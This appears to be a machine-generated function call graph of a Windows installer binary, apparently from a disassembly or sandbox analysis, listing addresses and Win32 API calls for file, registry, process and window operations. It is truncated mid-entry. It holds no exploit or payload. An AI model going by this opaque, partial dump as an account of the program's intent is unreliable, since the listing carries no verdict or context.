3948 404318 SendMessageW 3947->3948 3947->3951 3948->3951 3950 403fb8 22 API calls 3950->3951 3951->3947 3951->3950 3970 40450b SendMessageW 3951->3970 3971 406557 lstrcpynW 3951->3971 3953 404347 lstrlenW 3954 406594 21 API calls 3953->3954 3955 40435d SetWindowTextW 3954->3955 3956 401389 2 API calls 3955->3956 3956->3934 3957->3915 3958 4043bb CreateDialogParamW 3957->3958 3958->3915 3959 4043ee 3958->3959 3960 4044d6 22 API calls 3959->3960 3961 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3960->3961 3962 401389 2 API calls 3961->3962 3963 40443f 3962->3963 3963->3909 3964 404447 ShowWindow 3963->3964 3965 404522 SendMessageW 3964->3965 3965->3915 3967 4044b6 3966->3967 3968 4044bc SendMessageW 3966->3968 3967->3968 3968->3911 3969->3946 3970->3951 3971->3953 3972 4014d7 3973 402d89 21 API calls 3972->3973 3974 4014dd Sleep 3973->3974 3976 402c2f 3974->3976 3977 40195b 3978 402dab 21 API calls 3977->3978 3979 401962 lstrlenW 3978->3979 3980 40263d 3979->3980 3543 4020dd 3544 4021a1 3543->3544 3545 4020ef 3543->3545 3547 401423 28 API calls 3544->3547 3546 402dab 21 API calls 3545->3546 3548 4020f6 3546->3548 3553 4022fb 3547->3553 3549 402dab 21 API calls 3548->3549 3550 4020ff 3549->3550 3551 402115 LoadLibraryExW 3550->3551 3552 402107 GetModuleHandleW 3550->3552 3551->3544 3554 402126 3551->3554 3552->3551 3552->3554 3563 4069ba 3554->3563 3557 402170 3559 4055dc 28 API calls 3557->3559 3558 402137 3560 401423 28 API calls 3558->3560 3561 402147 3558->3561 3559->3561 3560->3561 3561->3553 3562 402193 FreeLibrary 3561->3562 3562->3553 3568 406579 WideCharToMultiByte 3563->3568 3565 4069d7 3566 402131 3565->3566 3567 4069de GetProcAddress 3565->3567 3566->3557 3566->3558 3567->3566 3568->3565 3981 402b5e 3982 402bb0 3981->3982 3983 402b65 3981->3983 3984 40694b 5 API calls 3982->3984 3986 402d89 21 API calls 3983->3986 3989 402bae 3983->3989 3985 402bb7 3984->3985 3987 402dab 21 API calls 3985->3987 3988 402b73 3986->3988 3990 402bc0 3987->3990 3991 402d89 21 API calls 3988->3991 3990->3989 3992 402bc4 IIDFromString 3990->3992 3995 402b7f 3991->3995 3992->3989 3993 402bd3 3992->3993 3993->3989 3999 406557 lstrcpynW 3993->3999 3998 40649e wsprintfW 3995->3998 3996 402bf0 CoTaskMemFree 3996->3989 3998->3989 3999->3996 3002 401761 3008 402dab 3002->3008 3006 40176f 3007 406076 2 API calls 3006->3007 3007->3006 3009 402db7 3008->3009 3010 406594 21 API calls 3009->3010 3011 402dd8 3010->3011 3012 401768 3011->3012 3013 406805 5 API calls 3011->3013 3014 406076 3012->3014 3013->3012 3015 406083 GetTickCount GetTempFileNameW 3014->3015 3016 4060bd 3015->3016 3017 4060b9 3015->3017 3016->3006 3017->3015 3017->3016 4000 401d62 4001 402d89 21 API calls 4000->4001 4002 401d73 SetWindowLongW 4001->4002 4003 402c2f 4002->4003 4004 4028e3 4005 4028eb 4004->4005 4006 4028ef FindNextFileW 4005->4006 4009 402901 4005->4009 4007 402948 4006->4007 4006->4009 4010 406557 lstrcpynW 4007->4010 4010->4009 4011 403be7 4012 403bf2 4011->4012 4013 403bf9 GlobalAlloc 4012->4013 4014 403bf6 4012->4014 4013->4014 4015 401568 4016 402ba9 4015->4016 4019 40649e wsprintfW 4016->4019 4018 402bae 4019->4018 4020 40196d 4021 402d89 21 API calls 4020->4021 4022 401974 4021->4022 4023 402d89 21 API calls 4022->4023 4024 401981 4023->4024 4025 402dab 21 API calls 4024->4025 4026 401998 lstrlenW 4025->4026 4028 4019a9 4026->4028 4027 4019ea 4028->4027 4032 406557 lstrcpynW 4028->4032 4030 4019da 4030->4027 4031 4019df lstrlenW 4030->4031 4031->4027 4032->4030 4033 40166f 4034 402dab 21 API calls 4033->4034 4035 401675 4034->4035 4036 4068b4 2 API calls 4035->4036 4037 40167b 4036->4037 4038 402af0 4039 402d89 21 API calls 4038->4039 4040 402af6 4039->4040 4041 402933 4040->4041 4042 406594 21 API calls 4040->4042 4042->4041 4043 4026f1 4044 402d89 21 API calls 4043->4044 4052 402700 4044->4052 4045 40283d 4046 40274a ReadFile 4046->4045 4046->4052 4047 4060ca ReadFile 4047->4052 4048 406128 5 API calls 4048->4052 4049 40278a MultiByteToWideChar 4049->4052 4050 40283f 4056 40649e wsprintfW 4050->4056 4052->4045 4052->4046 4052->4047 4052->4048 4052->4049 4052->4050 4053 4027b0 SetFilePointer MultiByteToWideChar 4052->4053 4055 402850 4052->4055 4053->4052 4054 402871 SetFilePointer 4054->4045 4055->4045 4055->4054 4056->4045 3448 401774 3449 402dab 21 API calls 3448->3449 3450 40177b 3449->3450 3451 4017a3 3450->3451 3452 40179b 3450->3452 3488 406557 lstrcpynW 3451->3488 3487 406557 lstrcpynW 3452->3487 3455 4017a1 3459 406805 5 API calls 3455->3459 3456 4017ae 3457 405e26 3 API calls 3456->3457 3458 4017b4 lstrcatW 3457->3458 3458->3455 3469 4017c0 3459->3469 3460 4068b4 2 API calls 3460->3469 3461 406022 2 API calls 3461->3469 3463 4017d2 CompareFileTime 3463->3469 3464 401892 3465 4055dc 28 API calls 3464->3465 3467 40189c 3465->3467 3466 4055dc 28 API calls 3468 40187e 3466->3468 3470 4032b9 35 API calls 3467->3470 3469->3460 3469->3461 3469->3463 3469->3464 3473 406594 21 API calls 3469->3473 3478 406557 lstrcpynW 3469->3478 3483 405bb7 MessageBoxIndirectW 3469->3483 3484 401869 3469->3484 3486 406047 GetFileAttributesW CreateFileW 3469->3486 3471 4018af 3470->3471 3472 4018c3 SetFileTime 3471->3472 3474 4018d5 CloseHandle 3471->3474 3472->3474 3473->3469 3474->3468 3475 4018e6 3474->3475 3476 4018eb 3475->3476 3477 4018fe 3475->3477 3479 406594 21 API calls 3476->3479 3480 406594 21 API calls 3477->3480 3478->3469 3481 4018f3 lstrcatW 3479->3481 3482 401906 3480->3482 3481->3482 3485 405bb7 MessageBoxIndirectW 3482->3485 3483->3469 3484->3466 3484->3468 3485->3468 3486->3469 3487->3455 3488->3456 4057 4014f5 SetForegroundWindow 4058 402c2f 4057->4058 4059 401a77 4060 402d89 21 API calls 4059->4060 4061 401a80 4060->4061 4062 402d89 21 API calls 4061->4062 4063 401a25 4062->4063 4064 401578 4065 401591 4064->4065 4066 401588 ShowWindow 4064->4066 4067 402c2f 4065->4067 4068 40159f ShowWindow 4065->4068 4066->4065 4068->4067 4069 4023f9 4070 402dab 21 API calls 4069->4070 4071 402408 4070->4071 4072 402dab 21 API calls 4071->4072 4073 402411 4072->4073 4074 402dab 21 API calls 4073->4074 4075 40241b GetPrivateProfileStringW 4074->4075 4076 401ffb 4077 402dab 21 API calls 4076->4077 4078 402002 4077->4078 4079 4068b4 2 API calls 4078->4079 4080 402008 4079->4080 4082 402019 4080->4082 4083 40649e wsprintfW 4080->4083 4083->4082 4084 401b7c 4085 402dab 21 API calls 4084->4085 4086 401b83 4085->4086 4087 402d89 21 API calls 4086->4087 4088 401b8c wsprintfW 4087->4088 4089 402c2f 4088->4089 4090 401000 4091 401037 BeginPaint GetClientRect 4090->4091 4092 40100c DefWindowProcW 4090->4092 4094 4010f3 4091->4094 4097 401179 4092->4097 4095 401073 CreateBrushIndirect FillRect DeleteObject 4094->4095 4096 4010fc 4094->4096 4095->4094 4098 401102 CreateFontIndirectW 4096->4098 4099 401167 EndPaint 4096->4099 4098->4099 4100 401112 6 API calls 4098->4100 4099->4097 4100->4099 4101 404980 4102 404990 4101->4102 4103 4049b6 4101->4103 4104 4044d6 22 API calls 4102->4104 4105 40453d 8 API calls 4103->4105 4106 40499d SetDlgItemTextW 4104->4106 4107 4049c2 4105->4107 4106->4103 4108 401680 4109 402dab 21 API calls 4108->4109 4110 401687 4109->4110 4111 402dab 21 API calls 4110->4111 4112 401690 4111->4112 4113 402dab 21 API calls 4112->4113 4114 401699 MoveFileW 4113->4114 4115 4016a5 4114->4115 4116 4016ac 4114->4116 4118 401423 28 API calls 4115->4118 4117 4068b4 2 API calls 4116->4117 4120 4022fb 4116->4120 4119 4016bb 4117->4119 4118->4120 4119->4120 4121 406317 40 API calls 4119->4121 4121->4115 4122 401503 4123 401508 4122->4123 4125 401520 4122->4125 4124 402d89 21 API calls 4123->4124 4124->4125 4126 401a04 4127 402dab 21 API calls 4126->4127 4128 401a0b 4127->4128 4129 402dab 21 API calls 4128->4129 4130 401a14 4129->4130 4131 401a1b lstrcmpiW 4130->4131 4132 401a2d lstrcmpW 4130->4132 4133 401a21 4131->4133 4132->4133 4134 402304 4135 402dab 21 API calls 4134->4135 4136 40230a 4135->4136 4137 402dab 21 API calls 4136->4137 4138 402313 4137->4138 4139 402dab 21 API calls 4138->4139 4140 40231c 4139->4140 4141 4068b4 2 API calls 4140->4141 4142 402325 4141->4142 4143 402336 lstrlenW lstrlenW 4142->4143 4144 402329 4142->4144 4146 4055dc 28 API calls 4143->4146 4145 4055dc 28 API calls 4144->4145 4148 402331 4144->4148 4145->4148 4147 402374 SHFileOperationW 4146->4147 4147->4144 4147->4148 4149 401d86 4150 401d99 GetDlgItem 4149->4150 4151 401d8c 4149->4151 4153 401d93 4150->4153 4152 402d89 21 API calls 4151->4152 4152->4153 4154 401dda GetClientRect LoadImageW SendMessageW 4153->4154 4155 402dab 21 API calls 4153->4155 4157 401e38 4154->4157 4159 401e44 4154->4159 4155->4154 4158 401e3d DeleteObject 4157->4158 4157->4159 4158->4159 4160 402388 4161 4023a2 4160->4161 4162 40238f 4160->4162 4163 406594 21 API calls 4162->4163 4164 40239c 4163->4164 4165 405bb7 MessageBoxIndirectW 4164->4165 4165->4161 3518 401389 3520 401390 3518->3520 3519 4013fe 3520->3519 3521 4013cb MulDiv SendMessageW 3520->3521 3521->3520 4166 402c0a SendMessageW 4167 402c24 InvalidateRect 4166->4167 4168 402c2f 4166->4168 4167->4168 4169 40460c lstrcpynW lstrlenW 3580 40248f 3581 402dab 21 API calls 3580->3581 3582 4024a1 3581->3582 3583 402dab 21 API calls 3582->3583 3584 4024ab 3583->3584 3597 402e3b 3584->3597 3587 4024e3 3589 4024ef 3587->3589 3592 402d89 21 API calls 3587->3592 3588 402dab 21 API calls 3591 4024d9 lstrlenW 3588->3591 3593 40250e RegSetValueExW 3589->3593 3594 4032b9 35 API calls 3589->3594 3590 402933 3591->3587 3592->3589 3595 402524 RegCloseKey 3593->3595 3594->3593 3595->3590 3598 402e56 3597->3598 3601 4063f2 3598->3601 3602 406401 3601->3602 3603 4024bb 3602->3603 3604 40640c RegCreateKeyExW 3602->3604 3603->3587 3603->3588 3603->3590 3604->3603 4170 402910 4171 402dab 21 API calls 4170->4171 4172 402917 FindFirstFileW 4171->4172 4173 40293f 4172->4173 4177 40292a 4172->4177 4178 40649e wsprintfW 4173->4178 4175 402948 4179 406557 lstrcpynW 4175->4179 4178->4175 4179->4177 4180 401911 4181 401948 4180->4181 4182 402dab 21 API calls 4181->4182 4183 40194d 4182->4183 4184 405c63 71 API calls 4183->4184 4185 401956 4184->4185 4186 401491 4187 4055dc 28 API calls 4186->4187 4188 401498 4187->4188 4189 401914 4190 402dab 21 API calls 4189->4190 4191 40191b 4190->4191 4192 405bb7 MessageBoxIndirectW 4191->4192 4193 401924 4192->4193 4194 404695 4195 4047c7 4194->4195 4196 4046ad 4194->4196 4197 404831 4195->4197 4200 4048fb 4195->4200 4203 404802 GetDlgItem SendMessageW 4195->4203 4199 4044d6 22 API calls 4196->4199 4198 40483b GetDlgItem 4197->4198 4197->4200 4201 404855 4198->4201 4202 4048bc 4198->4202 4204 404714 4199->4204 4205 40453d 8 API calls 4200->4205 4201->4202 4209 40487b SendMessageW LoadCursorW SetCursor 4201->4209 4202->4200 4210 4048ce 4202->4210 4227 4044f8 EnableWindow 4203->4227 4207 4044d6 22 API calls 4204->4207 4208 4048f6 4205->4208 4212 404721 CheckDlgButton 4207->4212 4228 404944 4209->4228 4214 4048e4 4210->4214 4215 4048d4 SendMessageW 4210->4215 4211 40482c 4217 404920 SendMessageW 4211->4217 4225 4044f8 EnableWindow 4212->4225 4214->4208 4216 4048ea SendMessageW 4214->4216 4215->4214 4216->4208 4217->4197 4220 40473f GetDlgItem 4226 40450b SendMessageW 4220->4226 4222 404755 SendMessageW 4223 404772 GetSysColor 4222->4223 4224 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4222->4224 4223->4224 4224->4208 4225->4220 4226->4222 4227->4211 4231 405b7d ShellExecuteExW 4228->4231 4230 4048aa LoadCursorW SetCursor 4230->4202 4231->4230 4232 402896 4233 40289d 4232->4233 4234 402bae 4232->4234 4235 402d89 21 API calls 4233->4235 4236 4028a4 4235->4236 4237 4028b3 SetFilePointer 4236->4237 4237->4234 4238 4028c3 4237->4238 4240 40649e wsprintfW 4238->4240 4240->4234 4241 401f17 4242 402dab 21 API calls 4241->4242 4243 401f1d 4242->4243 4244 402dab 21 API calls 4243->4244 4245 401f26 4244->4245 4246 402dab 21 API calls 4245->4246 4247 401f2f 4246->4247 4248 402dab 21 API calls 4247->4248 4249 401f38 4248->4249 4250 401423 28 API calls 4249->4250 4251 401f3f 4250->4251 4258 405b7d ShellExecuteExW 4251->4258 4253 401f87 4254 402933 4253->4254 4255 4069f6 5 API calls 4253->4255 4256 401fa4 CloseHandle 4255->4256 4256->4254 4258->4253 4259 402f98 4260 402faa SetTimer 4259->4260 4262 402fc3 4259->4262 4260->4262 4261 403018 4262->4261 4263 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4262->4263 4263->4261 4264 40571b 4265 4058c5 4264->4265 4266 40573c GetDlgItem GetDlgItem GetDlgItem 4264->4266 4268 4058f6 4265->4268 4269 4058ce GetDlgItem CreateThread CloseHandle 4265->4269 4309 40450b SendMessageW 4266->4309 4271 405921 4268->4271 4272 405946 4268->4272 4273 40590d ShowWindow ShowWindow 4268->4273 4269->4268 4270 4057ac 4276 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4270->4276 4274 405981 4271->4274 4278 405935 4271->4278 4279 40595b ShowWindow 4271->4279 4275 40453d 8 API calls 4272->4275 4311 40450b SendMessageW 4273->4311 4274->4272 4286 40598f SendMessageW 4274->4286 4281 405954 4275->4281 4284 405821 4276->4284 4285 405805 SendMessageW SendMessageW 4276->4285 4280 4044af SendMessageW 4278->4280 4282 40597b 4279->4282 4283 40596d 4279->4283 4280->4272 4288 4044af SendMessageW 4282->4288 4287 4055dc 28 API calls 4283->4287 4289 405834 4284->4289 4290 405826 SendMessageW 4284->4290 4285->4284 4286->4281 4291 4059a8 CreatePopupMenu 4286->4291 4287->4282 4288->4274 4293 4044d6 22 API calls 4289->4293 4290->4289 4292 406594 21 API calls 4291->4292 4294 4059b8 AppendMenuW 4292->4294 4295 405844 4293->4295 4298 4059d5 GetWindowRect 4294->4298 4299 4059e8 TrackPopupMenu 4294->4299 4296 405881 GetDlgItem SendMessageW 4295->4296 4297 40584d ShowWindow 4295->4297 4296->4281 4303 4058a8 SendMessageW SendMessageW 4296->4303 4300 405870 4297->4300 4301 405863 ShowWindow 4297->4301 4298->4299 4299->4281 4302 405a03 4299->4302 4310 40450b SendMessageW 4300->4310 4301->4300 4304 405a1f SendMessageW 4302->4304 4303->4281 4304->4304 4305 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4304->4305 4307 405a61 SendMessageW 4305->4307 4307->4307 4308 405a8a GlobalUnlock SetClipboardData CloseClipboard 4307->4308 4308->4281 4309->4270 4310->4296 4311->4271 4312 401d1c 4313 402d89 21 API calls 4312->4313 4314 401d22 IsWindow 4313->4314 4315 401a25 4314->4315 4316 404d1d 4317 404d49 4316->4317 4318 404d2d 4316->4318 4319 404d7c 4317->4319 4320 404d4f SHGetPathFromIDListW 4317->4320 4327 405b9b GetDlgItemTextW 4318->4327 4322 404d5f 4320->4322 4326 404d66 SendMessageW 4320->4326 4324 40140b 2 API calls 4322->4324 4323 404d3a SendMessageW 4323->4317 4324->4326 4326->4319 4327->4323 4328 40149e 4329 4023a2 4328->4329 4330 4014ac PostQuitMessage 4328->4330 4330->4329 2924 401ba0 2925 401bf1 2924->2925 2926 401bad 2924->2926 2928 401bf6 2925->2928 2929 401c1b GlobalAlloc 2925->2929 2927 401c36 2926->2927 2933 401bc4 2926->2933 2930 406594 21 API calls 2927->2930 2942 4023a2 2927->2942 2928->2942 2962 406557 lstrcpynW 2928->2962 2943 406594 2929->2943 2932 40239c 2930->2932 2963 405bb7 2932->2963 2960 406557 lstrcpynW 2933->2960 2936 401c08 GlobalFree 2936->2942 2937 401bd3 2961 406557 lstrcpynW 2937->2961 2940 401be2 2967 406557 lstrcpynW 2940->2967 2958 40659f 2943->2958 2944 4067e6 2945 4067ff 2944->2945 2990 406557 lstrcpynW 2944->2990 2945->2927 2947 4067b7 lstrlenW 2947->2958 2951 4066b0 GetSystemDirectoryW 2951->2958 2952 406594 15 API calls 2952->2947 2953 4066c6 GetWindowsDirectoryW 2953->2958 2954 406594 15 API calls 2954->2958 2955 406758 lstrcatW 2955->2958 2958->2944 2958->2947 2958->2951 2958->2952 2958->2953 2958->2954 2958->2955 2959 406728 SHGetPathFromIDListW CoTaskMemFree 2958->2959 2968 406425 2958->2968 2973 40694b GetModuleHandleA 2958->2973 2979 406805 2958->2979 2988 40649e wsprintfW 2958->2988 2989 406557 lstrcpynW 2958->2989 2959->2958 2960->2937 2961->2940 2962->2936 2964 405bcc 2963->2964 2965 405c18 2964->2965 2966 405be0 MessageBoxIndirectW 2964->2966 2965->2942 2966->2965 2967->2942 2991 4063c4 2968->2991 2971 406489 2971->2958 2972 406459 RegQueryValueExW RegCloseKey 2972->2971 2974 406971 GetProcAddress 2973->2974 2975 406967 2973->2975 2976 406980 2974->2976 2995 4068db GetSystemDirectoryW 2975->2995 2976->2958 2978 40696d 2978->2974 2978->2976 2985 406812 2979->2985 2980 40688d CharPrevW 2981 406888 2980->2981 2981->2980 2983 4068ae 2981->2983 2982 40687b CharNextW 2982->2981 2982->2985 2983->2958 2985->2981 2985->2982 2986 406867 CharNextW 2985->2986 2987 406876 CharNextW 2985->2987 2998 405e53 2985->2998 2986->2985 2987->2982 2988->2958 2989->2958 2990->2945 2992 4063d3 2991->2992 2993 4063d7 2992->2993 2994 4063dc RegOpenKeyExW 2992->2994 2993->2971 2993->2972 2994->2993 2996 4068fd wsprintfW LoadLibraryExW 2995->2996 2996->2978 2999 405e59 2998->2999 3000 405e6f 2999->3000 3001 405e60 CharNextW 2999->3001 3000->2985 3001->2999 4331 402621 4332 402dab 21 API calls 4331->4332 4333 402628 4332->4333 4336 406047 GetFileAttributesW CreateFileW 4333->4336 4335 402634 4336->4335 3429 4025a3 3440 402deb 3429->3440 3433 4025b6 3434 4025d2 RegEnumKeyW 3433->3434 3435 4025de RegEnumValueW 3433->3435 3436 402933 3433->3436 3437 4025fa RegCloseKey 3434->3437 3435->3437 3438 4025f3 3435->3438 3437->3436 3438->3437 3441 402dab 21 API calls 3440->3441 3442 402e02 3441->3442 3443 4063c4 RegOpenKeyExW 3442->3443 3444 4025ad 3443->3444 3445 402d89 3444->3445 3446 406594 21 API calls 3445->3446 3447 402d9e 3446->3447 3447->3433 4337 4015a8 4338 402dab 21 API calls 4337->4338 4339 4015af SetFileAttributesW 4338->4339 4340 4015c1 4339->4340 3522 401fa9 3523 402dab 21 API calls 3522->3523 3524 401faf 3523->3524 3525 4055dc 28 API calls 3524->3525 3526 401fb9 3525->3526 3527 405b3a 2 API calls 3526->3527 3528 401fbf 3527->3528 3529 401fe2 CloseHandle 3528->3529 3533 402933 3528->3533 3537 4069f6 WaitForSingleObject 3528->3537 3529->3533 3532 401fd4 3534 401fe4 3532->3534 3535 401fd9 3532->3535 3534->3529 3542 40649e wsprintfW 3535->3542 3538 406a10 3537->3538 3539 406a22 GetExitCodeProcess 3538->3539 3540 406987 2 API calls 3538->3540 3539->3532 3541 406a17 WaitForSingleObject 3540->3541 3541->3538 3542->3529 4341 40202f 4342 402dab 21 API calls 4341->4342 4343 402036 4342->4343 4344 40694b 5 API calls 4343->4344 4345 402045 4344->4345 4346 402061 GlobalAlloc 4345->4346 4347 4020d1 4345->4347 4346->4347 4348 402075 4346->4348 4349 40694b 5 API calls 4348->4349 4350 40207c 4349->4350 4351 40694b 5 API calls 4350->4351 4352 402086 4351->4352 4352->4347 4356 40649e wsprintfW 4352->4356 4354 4020bf 4357 40649e wsprintfW 4354->4357 4356->4354 4357->4347 4358 40252f 4359 402deb 21 API calls 4358->4359 4360 402539 4359->4360 4361 402dab 21 API calls 4360->4361 4362 402542 4361->4362 4363 40254d RegQueryValueExW 4362->4363 4365 402933 4362->4365 4364 40256d 4363->4364 4368 402573 RegCloseKey 4363->4368 4364->4368 4369 40649e wsprintfW 4364->4369 4368->4365 4369->4368 4370 4021af 4371 402dab 21 API calls 4370->4371 4372 4021b6 4371->4372 4373 402dab 21 API calls 4372->4373 4374 4021c0 4373->4374 4375 402dab 21 API calls 4374->4375 4376 4021ca 4375->4376 4377 402dab 21 API calls 4376->4377 4378 4021d4 4377->4378 4379 402dab 21 API calls 4378->4379 4380 4021de 4379->4380 4381 40221d CoCreateInstance 4380->4381 4382 402dab 21 API calls 4380->4382 4385 40223c 4381->4385 4382->4381 4383 401423 28 API calls 4384 4022fb 4383->4384 4385->4383 4385->4384 3018 403532 SetErrorMode GetVersionExW 3019 403586 GetVersionExW 3018->3019 3020 4035be 3018->3020 3019->3020 3021 403615 3020->3021 3022 40694b 5 API calls 3020->3022 3023 4068db 3 API calls 3021->3023 3022->3021 3024 40362b lstrlenA 3023->3024 3024->3021 3025 40363b 3024->3025 3026 40694b 5 API calls 3025->3026 3027 403642 3026->3027 3028 40694b 5 API calls 3027->3028 3029 403649 3028->3029 3030 40694b 5 API calls 3029->3030 3034 403655 #17 OleInitialize SHGetFileInfoW 3030->3034 3033 4036a4 GetCommandLineW 3107 406557 lstrcpynW 3033->3107 3106 406557 lstrcpynW 3034->3106 3036 4036b6 3037 405e53 CharNextW 3036->3037 3038 4036dc CharNextW 3037->3038 3046 4036ee 3038->3046 3039 4037f0 3040 403804 GetTempPathW 3039->3040 3108 403501 3040->3108 3042 40381c 3043 403820 GetWindowsDirectoryW lstrcatW 3042->3043 3044 403876 DeleteFileW 3042->3044 3047 403501 12 API calls 3043->3047 3118 403082 GetTickCount GetModuleFileNameW 3044->3118 3045 405e53 CharNextW 3045->3046 3046->3039 3046->3045 3052 4037f2 3046->3052 3049 40383c 3047->3049 3049->3044 3051 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3049->3051 3050 40388a 3053 403a7d ExitProcess CoUninitialize 3050->3053 3057 403931 3050->3057 3061 405e53 CharNextW 3050->3061 3054 403501 12 API calls 3051->3054 3203 406557 lstrcpynW 3052->3203 3055 403ab3 3053->3055 3056 403a8f 3053->3056 3059 40386e 3054->3059 3062 403b37 ExitProcess 3055->3062 3063 403abb GetCurrentProcess OpenProcessToken 3055->3063 3060 405bb7 MessageBoxIndirectW 3056->3060 3146 403c29 3057->3146 3059->3044 3059->3053 3066 403a9d ExitProcess 3060->3066 3075 4038a9 3061->3075 3067 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3063->3067 3068 403b07 3063->3068 3067->3068 3070 40694b 5 API calls 3068->3070 3071 403b0e 3070->3071 3076 403b23 ExitWindowsEx 3071->3076 3079 403b30 3071->3079 3072 403907 3204 405f2e 3072->3204 3073 40394a 3220 405b22 3073->3220 3075->3072 3075->3073 3076->3062 3076->3079 3278 40140b 3079->3278 3083 403969 3085 403981 3083->3085 3224 406557 lstrcpynW 3083->3224 3089 4039a7 wsprintfW 3085->3089 3103 4039d3 3085->3103 3086 403926 3219 406557 lstrcpynW 3086->3219 3090 406594 21 API calls 3089->3090 3090->3085 3093 4039e3 GetFileAttributesW 3095 4039ef DeleteFileW 3093->3095 3093->3103 3094 403a1d SetCurrentDirectoryW 3267 406317 MoveFileExW 3094->3267 3095->3103 3097 403a1b 3097->3053 3100 406317 40 API calls 3100->3103 3101 406594 21 API calls 3101->3103 3103->3085 3103->3089 3103->3093 3103->3094 3103->3097 3103->3100 3103->3101 3104 403aa5 CloseHandle 3103->3104 3225 405aab CreateDirectoryW 3103->3225 3228 405b05 CreateDirectoryW 3103->3228 3231 405c63 3103->3231 3272 405b3a CreateProcessW 3103->3272 3275 4068b4 FindFirstFileW 3103->3275 3104->3097 3106->3033 3107->3036 3109 406805 5 API calls 3108->3109 3111 40350d 3109->3111 3110 403517 3110->3042 3111->3110 3281 405e26 lstrlenW CharPrevW 3111->3281 3114 405b05 2 API calls 3115 403525 3114->3115 3116 406076 2 API calls 3115->3116 3117 403530 3116->3117 3117->3042 3284 406047 GetFileAttributesW CreateFileW 3118->3284 3120 4030c2 3138 4030d2 3120->3138 3285 406557 lstrcpynW 3120->3285 3122 4030e8 3286 405e72 lstrlenW 3122->3286 3126 4030f9 GetFileSize 3127 4031f3 3126->3127 3140 403110 3126->3140 3291 40301e 3127->3291 3129 4031fc 3131 40322c GlobalAlloc 3129->3131 3129->3138 3326 4034ea SetFilePointer 3129->3326 3302 4034ea SetFilePointer 3131->3302 3133 40325f 3135 40301e 6 API calls 3133->3135 3135->3138 3136 403215 3139 4034d4 ReadFile 3136->3139 3137 403247 3303 4032b9 3137->3303 3138->3050 3142 403220 3139->3142 3140->3127 3140->3133 3140->3138 3143 40301e 6 API calls 3140->3143 3323 4034d4 3140->3323 3142->3131 3142->3138 3143->3140 3144 403253 3144->3138 3144->3144 3145 403290 SetFilePointer 3144->3145 3145->3138 3147 40694b 5 API calls 3146->3147 3148 403c3d 3147->3148 3149 403c43 GetUserDefaultUILanguage 3148->3149 3150 403c55 3148->3150 3347 40649e wsprintfW 3149->3347 3151 406425 3 API calls 3150->3151 3153 403c85 3151->3153 3155 403ca4 lstrcatW 3153->3155 3156 406425 3 API calls 3153->3156 3154 403c53 3348 403eff 3154->3348 3155->3154 3156->3155 3159 405f2e 18 API calls 3160 403cd6 3159->3160 3161 403d6a 3160->3161 3163 406425 3 API calls 3160->3163 3162 405f2e 18 API calls 3161->3162 3164 403d70 3162->3164 3165 403d08 3163->3165 3166 403d80 LoadImageW 3164->3166 3167 406594 21 API calls 3164->3167 3165->3161 3172 403d29 lstrlenW 3165->3172 3173 405e53 CharNextW 3165->3173 3168 403e26 3166->3168 3169 403da7 RegisterClassW 3166->3169 3167->3166 3171 40140b 2 API calls 3168->3171 3170 403ddd SystemParametersInfoW CreateWindowExW 3169->3170 3179 403941 3169->3179 3170->3168 3176 403e2c 3171->3176 3174 403d37 lstrcmpiW 3172->3174 3175 403d5d 3172->3175 3177 403d26 3173->3177 3174->3175 3178 403d47 GetFileAttributesW 3174->3178 3180 405e26 3 API calls 3175->3180 3176->3179 3182 403eff 22 API calls 3176->3182 3177->3172 3181 403d53 3178->3181 3179->3053 3183 403d63 3180->3183 3181->3175 3184 405e72 2 API calls 3181->3184 3185 403e3d 3182->3185 3356 406557 lstrcpynW 3183->3356 3184->3175 3187 403e49 ShowWindow 3185->3187 3188 403ecc 3185->3188 3190 4068db 3 API calls 3187->3190 3357 4056af OleInitialize 3188->3357 3192 403e61 3190->3192 3191 403ed2 3193 403ed6 3191->3193 3194 403eee 3191->3194 3195 403e6f GetClassInfoW 3192->3195 3199 4068db 3 API calls 3192->3199 3193->3179 3201 40140b 2 API calls 3193->3201 3198 40140b 2 API calls 3194->3198 3196 403e83 GetClassInfoW RegisterClassW 3195->3196 3197 403e99 DialogBoxParamW 3195->3197 3196->3197 3200 40140b 2 API calls 3197->3200 3198->3179 3199->3195 3202 403ec1 3200->3202 3201->3179 3202->3179 3203->3040 3375 406557 lstrcpynW 3204->3375 3206 405f3f 3376 405ed1 CharNextW CharNextW 3206->3376 3209 403913 3209->3053 3218 406557 lstrcpynW 3209->3218 3210 406805 5 API calls 3216 405f55 3210->3216 3211 405f86 lstrlenW 3212 405f91 3211->3212 3211->3216 3213 405e26 3 API calls 3212->3213 3215 405f96 GetFileAttributesW 3213->3215 3214 4068b4 2 API calls 3214->3216 3215->3209 3216->3209 3216->3211 3216->3214 3217 405e72 2 API calls 3216->3217 3217->3211 3218->3086 3219->3057 3221 40694b 5 API calls 3220->3221 3222 40394f lstrlenW 3221->3222 3223 406557 lstrcpynW 3222->3223 3223->3083 3224->3085 3226 405af7 3225->3226 3227 405afb GetLastError 3225->3227 3226->3103 3227->3226 3229 405b15 3228->3229 3230 405b19 GetLastError 3228->3230 3229->3103 3230->3229 3232 405f2e 18 API calls 3231->3232 3233 405c83 3232->3233 3234 405ca2 3233->3234 3235 405c8b DeleteFileW 3233->3235 3236 405dc2 3234->3236 3382 406557 lstrcpynW 3234->3382 3264 405dd9 3235->3264 3243 4068b4 2 API calls 3236->3243 3236->3264 3238 405cc8 3239 405cdb 3238->3239 3240 405cce lstrcatW 3238->3240 3242 405e72 2 API calls 3239->3242 3241 405ce1 3240->3241 3244 405cf1 lstrcatW 3241->3244 3246 405cfc lstrlenW FindFirstFileW 3241->3246 3242->3241 3245 405de7 3243->3245 3244->3246 3247 405e26 3 API calls 3245->3247 3245->3264 3246->3236 3248 405d1e 3246->3248 3249 405df1 3247->3249 3250 405da5 FindNextFileW 3248->3250 3260 405c63 64 API calls 3248->3260 3262 4055dc 28 API calls 3248->3262 3265 4055dc 28 API calls 3248->3265 3266 406317 40 API calls 3248->3266 3383 406557 lstrcpynW 3248->3383 3384 405c1b 3248->3384 3251 405c1b 5 API calls 3249->3251 3250->3248 3254 405dbb FindClose 3250->3254 3253 405dfd 3251->3253 3255 